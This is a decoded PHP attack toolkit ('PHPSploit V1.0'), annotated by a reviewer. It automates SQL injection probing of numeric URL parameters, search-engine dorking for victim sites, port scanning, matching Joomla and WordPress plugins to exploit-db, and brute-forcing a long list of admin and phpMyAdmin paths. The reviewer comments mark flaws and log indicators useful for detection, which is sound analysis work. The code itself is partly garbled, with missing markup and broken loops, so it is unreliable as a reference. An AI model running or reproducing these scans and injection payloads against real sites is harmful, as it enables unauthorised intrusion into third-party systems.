/* Decoded by unphp.net */ ?> Not FoundDownload"; }else{ echo"Found ..!<--"; } }
/* NOTE(review): the text above is the tail of a definition whose beginning is not in this listing
   (presumably ask_exploit_db(), which the two functions below call; confirm against the full sample).
   Markup inside string literals is missing throughout this listing; the remaining tokens are kept as found. */
/**************************************************************/
/**
 * Fetches the page at $site1 and prints every distinct Joomla component name found in its source,
 * handing each name to ask_exploit_db() (not defined in this listing).
 *
 * Names are collected from three patterns: "option,<name>/", "option=<name>" and "/components/<name>/".
 * Nothing is returned; all output is echoed.
 *
 * @param string $site1 URL to fetch; the caller below builds it from $_GET['webvuln'].
 */
function get_components($site1){
    // Function that extracts the extensions from the page source (Joomla)
    // "@" hides fetch errors, so a failed request simply ends in the "Nothing Found" message below.
    $source = @file_get_contents($site1);
    preg_match_all('{option,(.*?)/}i',$source,$f);
    preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
    preg_match_all('{/components/(.*?)/}i',$source,$f3);
    $arz=array_merge($f2[1],$f[1],$f3[1]);
    $coms=array();
    if(count($arz)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";}
    // De-duplicate the captured names before reporting them.
    foreach(array_unique($arz) as $x){ $coms[]=$x; }
    foreach($coms as $comm){
        // NOTE(review): $comm is text taken from the remote page and is echoed without escaping.
        echo "$comm";
        ask_exploit_db($comm);
    }
}
/**************************************************************/
/**
 * Fetches the page at $site1 and prints every distinct WordPress plugin directory name
 * ("/plugins/<name>/") found in its source, handing each name to ask_exploit_db().
 *
 * @param string $site1 URL to fetch; the caller below builds it from $_GET['webvuln'].
 */
function get_plugins($site1){
    // Function that extracts the extensions from the page source (WordPress)
    $source = @file_get_contents($site1);
    preg_match_all("#/plugins/(.*?)/#i", $source, $f);
    $plugins=array_unique($f[1]);
    if(count($plugins)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... 
check it .";}
    foreach($plugins as $plugin){
        // NOTE(review): as in get_components(), remote text is echoed without escaping.
        echo "$plugin";
        ask_exploit_db($plugin);
    }
}
/**************************************************************/
/**
 * Prints the start of the results table.
 * NOTE(review): both echoed strings are (nearly) empty in this listing, and $site1 is not used in
 * the code that remains.
 */
function t_header($site1){
    // Start of the table
    echo'';
    echo' ';
}
//--------------fin gripp
// Party vulnerability
// Request parameters read in this branch: "webvuln" (target host) and "what" ("joomla" or "wordpress").
// Only strip_tags() and trim() are applied before the value is placed in an outbound URL, and no access
// check is visible in this listing, so whoever can reach the script decides what the server fetches.
$site1=strip_tags(trim($_GET['webvuln']));
t_header($site1);
$url_to_change = $site1;
$www = 'www';
$position = strpos($url_to_change, $www);
// Prefix "www." when the substring "www" does not occur anywhere in the supplied host.
if ($position === false) { $site1 = str_replace("".$site1."", "www.".$site1."", $site1); } else { echo ''; }
// Neither function returns a value, so the outer echo prints nothing beyond what they echo themselves.
if($_GET['what'] == 'joomla') { echo get_components("http://".$site1); }
elseif($_GET['what'] == 'wordpress') { echo get_plugins("http://".$site1); }
} elseif($_GET['dork']) {
//////////////// Here, for the simple sites: SQLi only for now
// NOTE(review): the text between "?>" and "=2)" is missing from this listing. What follows looks like the
// tail of the function the debug endpoint below calls as sqlcheck(); fetch() is not defined here either.
?> =2) && (is_numeric($vars[1]))){
                // Error-based check: the parameter value gets an encoded single quote (%27) appended.
                $final = str_replace($query,$query."%27",$url_);
                //echo $final;
                // Three requests per numeric parameter reach the target from this point.
                $content = fetch($final);
                $url_1 = file_get_contents($url_);
                $url_2 = file_get_contents($final);
                // The parameter is reported when the response contains a database-error phrase OR when the
                // two fetched bodies differ at all.
                // NOTE(review): the pattern includes the bare words "Warning" and "SQL", and any dynamic page
                // content makes the two bodies differ, so this check over-reports.
                if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){ return $vars[0]; }
            }
        }
    }
    return ""; // failed (original comment: "gagal son")
}
/**
 * Boolean-based check of every numeric query-string parameter of $url_.
 *
 * For each such parameter two requests are sent through fetch(): one with an appended condition that
 * compares a random number with itself, one that compares it with 0. The tag-stripped response lengths
 * are compared; if the first response is at least 30 bytes longer, the parameter name is returned.
 * When the unquoted form shows no such difference, the same pair is repeated with a leading %27.
 *
 * In the target's access log these requests show up as a numeric parameter value followed by the
 * literal sequences "%20AND%20<4 digits>%3D%28SELECT%20" and "%29", which is what a log search or
 * WAF rule can match on.
 *
 * @param string $url_ URL to test; a leading "http://" is stripped and re-added.
 * @return string Name of the first parameter that met the threshold, or "" when none did.
 */
function sqlheavycheck($url_){
    // clean url
    $url_ = "http://".trim(str_ireplace("http://","",$url_));
    $url_ = str_ireplace("&","&",$url_);
    // check if url contains querystring
    $pos = stripos($url_,"?");
    if($pos !== false){
        $url = substr($url_,0,$pos);
        $que = substr($url_,$pos+1);
        $querys = explode("&",$que);
        foreach($querys as $query){
            $vars = explode("=",$query);
            //echo $query;
            // check if parameter has a numeric value
            if((count($vars)>=2) && (is_numeric($vars[1]))){
                // and 1=(select 1)
                // $acak ("random") is a 4-digit number used on both sides of the comparison.
                $acak = rand(1111,9999);
                $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
                $contrue = fetch($final);
                // NOTE(review): the line below and the '";' after it are the two halves of a commented-out
                // debug echo; whatever stood between them is missing from this listing.
                //echo "final1 : ".$final."
"; // and 1=(select 0)
                $acak = rand(1111,9999);
                $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
                //echo "final2 : ".$final."
";
                $confalse = fetch($final);
                // Compare visible text length only (markup removed).
                $numtrue = strlen(strip_tags($contrue));
                $numfalse = strlen(strip_tags($confalse));
                // $selisih ("difference") is signed: only a longer "true" page can reach the threshold.
                $selisih = $numtrue - $numfalse;
                if($selisih >= 30){ return $vars[0]; }
                else{
                    //' and 1=(select 1) and '1'='1
                    $acak = rand(1111,9999);
                    $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
                    $contrue = fetch($final);
                    //echo "final1 : ".$final."
"; //' and 1=(select 0) and '1'='1
                    $acak = rand(1111,9999);
                    $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
                    //echo "final2 : ".$final."
";
                    $confalse = fetch($final);
                    $numtrue = strlen(strip_tags($contrue));
                    $numfalse = strlen(strip_tags($confalse));
                    $selisih = $numtrue - $numfalse;
                    if($selisih >= 30){ return $vars[0]; }
                }
            }
        }
    }
    return ""; // failed (original comment: "gagal son...")
}
// debugging tools
// Two direct endpoints: ?check=<url> and ?heavycheck=<url> run one check and stop.
// NOTE(review): the supplied value is echoed back without escaping, and no access check is visible here.
if(isset($_GET['check'])&&($_GET['check']!="")){ $url = $_GET['check']; echo $url." ".sqlcheck($url); die(); }
if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){ $url = $_GET['heavycheck']; echo $url." ".sqlheavycheck($url); die(); }
// debugging tools end
// Search-engine driven mode: parameters "dork", "setype" ("google" or "bing") and "page".
if(isset($_GET['dork'])&&($_GET['dork']!="")){
    $gnum = 10; // number of search results per page
    $setype = "google"; // default: search with Google
    if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));
    if(isset($_GET['page'])){ $gpage = (int) $_GET['page']; if($gpage < 1) $gpage = 1; } else $gpage = 1;
    // Turn the 1-based page number into a result offset.
    $gpage = ($gpage - 1) * $gnum;
    // NOTE(review): $gpage is >= 0 at this point, so this condition cannot be true and the branch is dead.
    if($gpage > ($gpage * $gnum)){ echo "_finish_|max only ".$gpage." results"; die(); }
    $dork = stripslashes($_GET['dork']);
    $dorkg = "site:".urldecode($dork)." filetype:php";
    $dorkb = urldecode("site:".$dork."+php");
    $dorkb = str_replace(" ","+",$dorkb);
    if($setype == "google"){
        for($i=1; $i<3; $i++) {
            // The remainder of this loop is garbled in the listing (the explode() delimiter is missing).
            $gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage");
            $raws = explode("

",$gsearch); if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/

[X] ".$setype.""; die(); } } } elseif($setype == "bing"){ for($i=1; $i<3; $i++) { $dork = preg_replace("/^[^:]*:(.*)/i","",$dorkb); $gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3"); $raws = explode("

",$gsearch); if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){ echo "[X] ".$setype.""; die(); } } } else{ echo "Search engine not supported"; die(); } foreach($raws as $korban){ if(strlen($korban) >= 9 && (substr($korban,0,9)=="".$url." @ ".$vulnvar."
"; else $laporan = "".$url."
"; echo $laporan; } else{ $vulnvar = sqlcheck($url); if($vulnvar != "") $laporan = "".$url." @ ".$vulnvar."
"; else $laporan = "".$url."
"; echo $laporan; } } } } die(); // mas kamu koq looyo... } } else { $list['front'] ="admin team adm admincp admcp cp modcp moderatorcp adminare admins cpanel controlpanel"; $list['end'] = "admin1.php team admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html ccms/ upload.php ccms/login.php ccms/index.php maintenance/ webmaster/ adm/ configuration/ configure/ websvn/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpMyAdmin/ phpmyadmin/ PMA/ admin/ dbadmin/ mysql/ myadmin/ phpmyadmin2/ phpMyAdmin2/ phpMyAdmin-2/ php-my-admin/ weMeanYouNoHarm/ V20xRmRRPT0K/ admin/pma/ admin/phpmyadmin/ db/ myadmin/ mysql/ mysqladmin/ typo3/phpmyadmin/ phpadmin/ phpmyadmin1/ web/phpMyAdmin/ xampp/phpmyadmin/ web/ php-my-admin/ websql/ 
phpMyAdmin-2/ php-my-admin/ phpMyAdmin-2.8.2.1/ phpMyAdmin-2.8.2.2/ phpMyAdmin-2.8.2.3/ phpMyAdmin-2.8.2.4/ phpMyAdmin-2.10.0.0/ phpMyAdmin-2.10.0.1/ phpMyAdmin-2.10.0.2/ phpMyAdmin-2.10.1.0/ phpMyAdmin-2.10.2.0/ phpMyAdmin-2.11.0.0/ phpMyAdmin-2.11.1.0/ phpMyAdmin-2.11.1.1/ phpMyAdmin-2.11.1.2/ phpMyAdmin-2.11.2.0/ phpMyAdmin-2.11.2.1/ phpMyAdmin-2.11.2.2/ phpMyAdmin-2.11.3.0/ phpMyAdmin-2.11.4.0/ phpMyAdmin-2.11.5.0/ phpMyAdmin-2.11.5.1/ phpMyAdmin-2.11.5.2/ phpMyAdmin-2.11.6.0/ phpMyAdmin-2.11.7.0/ phpMyAdmin-2.11.7.1/ phpMyAdmin-2.11.8.0/ phpMyAdmin-2.11.9.0/ phpMyAdmin-2.11.9.1/ phpMyAdmin-2.11.9.2/ phpMyAdmin-2.11.9.3/ phpMyAdmin-2.11.9.4/ phpMyAdmin-3.0.0.0/ phpMyAdmin-3.0.1.0/ phpMyAdmin-3.0.1.1/ phpMyAdmin-3.0.2.0/ phpMyAdmin-3.1.0.0/ phpMyAdmin-3.1.1.0/ phpMyAdmin-3.1.2.0/ phpMyAdmin-3.1.3.0/ phpMyAdmin-2.9.0-rc1/ phpMyAdmin-2.9.0/ phpMyAdmin-2.9.0.1/ phpMyAdmin-2.9.0.2/ phpMyAdmin-2.9.1/ phpMyAdmin-2.9.2/ phpMyAdmin-3.4.3.1-all-languages/ phpMyAdmin-3.4.3.1-english/ phpMyAdmin-3.4.3.1/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ pma2006/ pma2007/ pma2008/ pma2009/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ databaseadmin/ admm/ admn/ w00tw00t.at.blackhats.romanian.anti-sec:)/ phpMyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ pma/scripts/setup.php/ myadmin/scripts/setup.php/ MyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ phpMyAdmin/scripts/setup.php/ phpMyAdmin-2.2.3/ phpMyAdmin-2.2.6/ phpMyAdmin-2.5.1/ phpMyAdmin-2.5.4/ phpMyAdmin-2.5.5-rc1/ phpMyAdmin-2.5.5-rc2/ phpMyAdmin-2.5.5/ phpMyAdmin-2.5.5-pl1/ phpMyAdmin-2.5.6-rc1/ phpMyAdmin-2.5.6-rc2/ phpMyAdmin-2.5.6/ phpMyAdmin-2.5.7/ phpMyAdmin-2.5.7-pl1/ phpMyAdmin-2.6.0-alpha/ phpMyAdmin-2.6.0-alpha2/ phpMyAdmin-2.6.0-beta1/ phpMyAdmin-2.6.0-beta2/ phpMyAdmin-2.6.0-rc1/ phpMyAdmin-2.6.0-rc2/ phpMyAdmin-2.6.0-rc3/ phpMyAdmin-2.6.0/ phpMyAdmin-2.6.0-pl1/ phpMyAdmin-2.6.0-pl2/ phpMyAdmin-2.6.0-pl3/ phpMyAdmin-2.6.1-rc1/ 
phpMyAdmin-2.6.1-rc2/ phpMyAdmin-2.6.1/ phpMyAdmin-2.6.1-pl1/ phpMyAdmin-2.6.1-pl2/ phpMyAdmin-2.6.1-pl3/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2-beta1/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2/ phpMyAdmin-2.6.2-pl1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-rc1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-pl1/ phpMyAdmin-2.6.4-rc1/ phpMyAdmin-2.6.4-pl1/ phpMyAdmin-2.6.4-pl2/ phpMyAdmin-2.6.4-pl3/ phpMyAdmin-2.6.4-pl4/ phpMyAdmin-2.6.4/ phpMyAdmin-2.7.0-beta1/ phpMyAdmin-2.7.0-rc1/ phpMyAdmin-2.7.0-pl1/ phpMyAdmin-2.7.0-pl2/ phpMyAdmin-2.7.0/ phpMyAdmin-2.8.0-beta1/ phpMyAdmin-2.8.0-rc1/ phpMyAdmin-2.8.0-rc2/ phpMyAdmin-2.8.0/ phpMyAdmin-2.8.0.1/ phpMyAdmin-2.8.0.2/ phpMyAdmin-2.8.0.3/ phpMyAdmin-2.8.0.4/ phpMyAdmin-2.8.1-rc1/ phpMyAdmin-2.8.1/ phpMyAdmin-2.8.2/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ 
irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ adminarea/ bb-admin/ adminLogin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ admin/admin.php admin_area/admin.php admin_area/login.php siteadmin/login.php siteadmin/index.php siteadmin/login.html admin/admin.html admin_area/index.php bb-admin/index.php bb-admin/login.php bb-admin/admin.php admin_area/login.html admin_area/index.html admincp/index.asp admincp/login.asp admincp/index.html webadmin/index.html webadmin/admin.html webadmin/login.html admin/admin_login.html admin_login.html panel-administracion/login.html nsw/admin/login.php webadmin/login.php admin/admin_login.php admin_login.php admin_area/admin.html pages/admin/admin-login.php admin/admin-login.php admin-login.php bb-admin/index.html bb-admin/login.html bb-admin/admin.html admin/home.html pages/admin/admin-login.html admin/admin-login.html admin-login.html admin/adminLogin.html adminLogin.html home.html rcjakar/admin/login.php adminarea/index.html adminarea/admin.html webadmin/index.php webadmin/admin.php user.html modelsearch/login.html adminarea/login.html panel-administracion/index.html panel-administracion/admin.html modelsearch/index.html modelsearch/admin.html admincontrol/login.html adm/index.html adm.html user.php panel-administracion/login.php wp-login.php adminLogin.php admin/adminLogin.php home.php adminarea/index.php adminarea/admin.php adminarea/login.php panel-administracion/index.php panel-administracion/admin.php modelsearch/index.php modelsearch/admin.php admincontrol/login.php adm/admloginuser.php admloginuser.php admin2/login.php admin2/index.php adm/index.php adm.php affiliate.php adm_auth.php memberadmin.php 
administratorlogin.php admin/admin.asp admin_area/admin.asp admin_area/login.asp admin_area/index.asp bb-admin/index.asp bb-admin/login.asp bb-admin/admin.asp pages/admin/admin-login.asp admin/admin-login.asp admin-login.asp user.asp webadmin/index.asp webadmin/admin.asp webadmin/login.asp admin/admin_login.asp admin_login.asp panel-administracion/login.asp adminLogin.asp admin/adminLogin.asp home.asp adminarea/index.asp adminarea/admin.asp adminarea/login.asp panel-administracion/index.asp panel-administracion/admin.asp modelsearch/index.asp modelsearch/admin.asp admincontrol/login.asp adm/admloginuser.asp admloginuser.asp admin2/login.asp admin2/index.asp adm/index.asp adm.asp affiliate.asp adm_auth.asp memberadmin.asp administratorlogin.asp siteadmin/login.asp siteadmin/index.asp ADMIN/ paneldecontrol/ login/ cms/ admon/ ADMON/ administrador/ ADMIN/login.php panelc/ ADMIN/login.html admin.php login.htm login.html login/ login.php adm/ admin/ admin/account.html admin/login.html admin/login.htm admin/home.php admin/controlpanel.html admin/controlpanel.htm admin/cp.php admin/adminLogin.html admin/adminLogin.htm admin/admin_login.php admin/controlpanel.php admin/admin-login.php admin-login.php admin/account.php admin/admin.php admin.htm admin.html adminitem/ adminitem.php adminitems/ adminitems.php administrator/ administrator/login.php administrator.php administration/ administration.php adminLogin/ adminlogin.php admin_area/admin.php admin_area/ admin_area/login.php manager/ manager.php letmein/ letmein.php superuser/ superuser.php access/ access.php sysadm/ sysadm.php superman/ supervisor/ panel.php control/ control.php member/ member.php members/ members.php user/ user.php cp/ uvpanel/ manage/ manage.php management/ management.php signin/ signin.php log-in/ log-in.php log_in/ log_in.php sign_in/ sign_in.php sign-in/ sign-in.php users/ users.php accounts/ accounts.php wp-login.php bb-admin/login.php bb-admin/admin.php bb-admin/admin.html administrator/account.php 
relogin.htm relogin.html check.php relogin.php processlogin.php checklogin.php checkuser.php checkadmin.php isadmin.php authenticate.php authentication.php auth.php authuser.php authadmin.php cp.php modelsearch/login.php moderator.php moderator/ controlpanel/ controlpanel.php admincontrol.php adminpanel.php fileadmin/ fileadmin.php sysadmin.php admin1.php admin1.html admin1.htm admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html phpmyadmin/ myadmin/ ur-admin.php ur-admin/ Server.php Server/ wp-admin/ administr8.php administr8/ webadmin/ webadmin.php administratie/ admins/ admins.php administrivia/ Database_Administration/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ power_user/ system_administration/ ss_vms_admin_sm/ bb-admin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ adm.php admin_login.php panel-administracion/login.php pages/admin/admin-login.php pages/admin/ acceso.php admincp/login.php admincp/ adminarea/ admincontrol/ affiliate.php adm_auth.php memberadmin.php administratorlogin.php modules/admin/ 
administrators.php siteadmin/ siteadmin.php adminsite/ kpanel/ vorod/ vorod.php vorud/ vorud.php adminpanel/ PSUser/ secure/ webmaster/ webmaster.php autologin.php userlogin.php admin_area.php cmsadmin.php security/ usr/ root/ secret/ admin/login.php admin/adminLogin.php moderator.php moderator.html moderator/login.php moderator/admin.php yonetici.php 0admin/ 0manager/ aadmin/ cgi-bin/login.php login1.php login_admin/ login_admin.php login_out/ login_out.php login_user.php loginerror/ loginok/ loginsave/ loginsuper/ loginsuper.php login.php logout/ logout.php secrets/ super1/ super1.php super_index.php super_login.php supermanager.php superman.php superuser.php supervise/ supervise/Login.php super.php"; function template() { echo ' PHPSploit V1.0 '; ?>

Site : '.$site1.' Exploit-db Exploit it !
WebSite Party

URL:


404 error page:


Verified: 0 / 0

Stalk3R@live.CoM © www.sec4ever.com

'; ?>
'; if($_POST['xploit_submit']) { echo '
'; echo ' Infos about website:
*******************/

Ports scanner:
*************/
'; // Port scanner $port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080"); $port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)"); $site = $_POST['xploit_url']; $site = str_replace("http://", "", $site); $ip_target = gethostbyname("".$site.""); for($i=0;$i<12;$i++) { $fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1); if($fp) { echo "". $port_name[$i] ." port " . $port[$i] . " OPEN on " . $ip_target . "
"; fclose($fp); } else { echo "". $port_name[$i] ." port " . $port[$i] . " CLOSED on " . $ip_target . "
"; } flush(); } //------------------------------------------- echo '
'; echo ' Found ones:
***********/
'; echo '
'; echo ' Websites on the server:
*********************/
'; if($_POST['xploit_submit']) { $dorkk = "ip:".$ip_target; $pageNum = 0; for($pageNum = 0; $pageNum < 10; $pageNum++) { $bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum.""); if(!preg_match("/No results found for/",$bing)) { preg_match_all("/

/",$bing,$sites); if(count($sites[1])==0) {return false;} for($i=0 ; $i < count($sites[1]);$i++) { $site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]); $site2 = substr($site2,0,strpos($site2,"/",0));; if(!in_array($site2,$arrayy)) { //Search for JOOMLA & WORDPRESS $headers_joomla = @get_headers("http://".$site2."/administrator"); $headers_wordpress = @get_headers("http://".$site2."/wp-admin"); if(strpos($headers_joomla[0],'404') === false) { $joomla = "joomla"; $site3 = $site2." (JOOMLA) | TEST VULNERABILITY"; echo $site3. "
"; ?>

TEST VULNERABILITY"; echo $site3. "
"; ?>

TEST VULNERABILITY
"; $site4 = str_replace("www.", "", $site2); $site4 = str_replace("http://", "", $site2); ?>
">

">

";} } echo '



'; echo ' Admin page Finder:
******************/

'; } }
/* NOTE(review): the line above closes a string and two blocks that begin earlier in the listing. */
/**
 * Emits one progress message to the page and flushes the output buffers.
 *
 * NOTE(review): the echoed string is empty in this listing, so how $msg, $place and $replace were used
 * in the output cannot be seen here; $place and $replace are not referenced in the remaining code.
 *
 * @param mixed  $msg     Text (or counter) to show.
 * @param int    $br      When 1, a line terminator is appended to $msg.
 * @param int    $stop    When 1, the script exits right after the echo (before the flush calls).
 * @param string $place   Callers pass 'logbox', 'total', 'verified' or 'rightcol'.
 * @param int    $replace Callers pass 1 for the 'total' and 'verified' counters, 0 otherwise.
 */
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
    if($br == 1) $msg .= "
";
    echo "";
    if($stop == 1) exit;
    @flush();@ob_flush();
}
/**
 * NOTE(review): the body is a copy of show(), but $br, $msg and $stop are neither parameters nor
 * assigned here, and $site / $port are never read. No call to this function is visible in the part of
 * the listing reviewed here.
 */
function showport($site, $port) {
    if($br == 1) $msg .= "
";
    echo "";
    if($stop == 1) exit;
    @flush();@ob_flush();
}
/**
 * Tests whether one candidate admin location exists on the target.
 *
 * With $front == 0 the candidate is a path appended to the global $site; otherwise it is treated as a
 * sub-domain label and the URL "http://<label>.<site>/" is built.
 *
 * @param string $x     Path (for $front == 0) or sub-domain label.
 * @param int    $front 0 = path under $site, anything else = sub-domain of $site.
 * @return int 1 when the URL answered with "200" in its status line and the body was not recognised as
 *             the site's error page, 0 otherwise.
 */
function check($x, $front=0) {
    global $_POST,$site,$false;
    if($front == 0) $t = $site.$x;
    else $t = 'http://'.$x.'.'.$site.'/';
    // Each candidate costs the target up to two requests: get_headers() here, file_get_contents() below.
    $headers = get_headers($t);
    // NOTE(review): eregi() was removed in PHP 7.0, so this code path only runs on PHP 5.x. It matches
    // "200" anywhere in the status line.
    if (!eregi('200', $headers[0])) return 0;
    $data = @file_get_contents($t);
    // No user-supplied 404 marker: compare the body with the reference error page fetched at start-up.
    if($_POST['xploit_404string'] == "") if($data == $false) return 0;
    // NOTE(review): strpos() returns 0 for a match at offset 0, which this truthiness test treats as
    // "marker not found".
    if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
    return 1;
}
// ------------------------------------------------------------------------------------------------------
// Admin-page finder main flow. Inputs: POST "xploit_url" (target) and "xploit_404string" (optional text
// that marks the target's error page).
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
$site = $_POST['xploit_url'];
// Normalise to "http://<host>/..." with a trailing slash.
$site = str_replace("http://", "", $site);
$site = "http://".$site;
if ($site[strlen($site)-1] != "/") $site .= "/";
// Reference error page: one request for a fixed, deliberately non-existent file name. The literal name
// below appears once per run in the target's access log, followed by a burst of requests for the paths
// in $list['end'], which makes it a usable detection indicator for this tool.
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
// NOTE(review): as printed, these two calls remove every space and the explode(" ") calls below would
// then yield a single element; the first str_replace() argument was presumably a different whitespace
// character in the original file (confirm against the raw sample).
$list['end'] = str_replace(" ", "", $list['end']);
$list['front'] = str_replace(" ", "", $list['front']);
$pathes = explode(" ", $list['end']);
$frontpathes = explode(" ", $list['front']);
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
// Pass 1: candidate paths under the target URL.
foreach($pathes as $path) {
    show('Checking '.$site.$path.' 
: ', 0, 0, 'logbox', 0);
    $verificate++;
    show($verificate, 0, 0, 'verified', 1);
    if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
    else{
        show('found', 1, 0, 'logbox', 0);
        show(''.$site.$path.'', 1, 0, 'rightcol', 0);
    }
}
// Reduce $site to its host name and drop a leading "www." before the sub-domain pass.
preg_match("/\/\/(.*?)\//i", $site, $xx);
$site = $xx[1];
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
// Pass 2: candidate sub-domains ("http://<label>.<host>/"), visible to the target as DNS lookups and
// requests for names taken from $list['front'].
foreach($frontpathes as $frontpath) {
    show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
    $verificate++;
    show($verificate, 0, 0, 'verified', 1);
    if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
    else{
        show('found', 1, 0, 'logbox', 0);
        show(''.$frontpath.'.'.$site.'', 1, 0, 'rightcol', 0);
    }
}
} ?>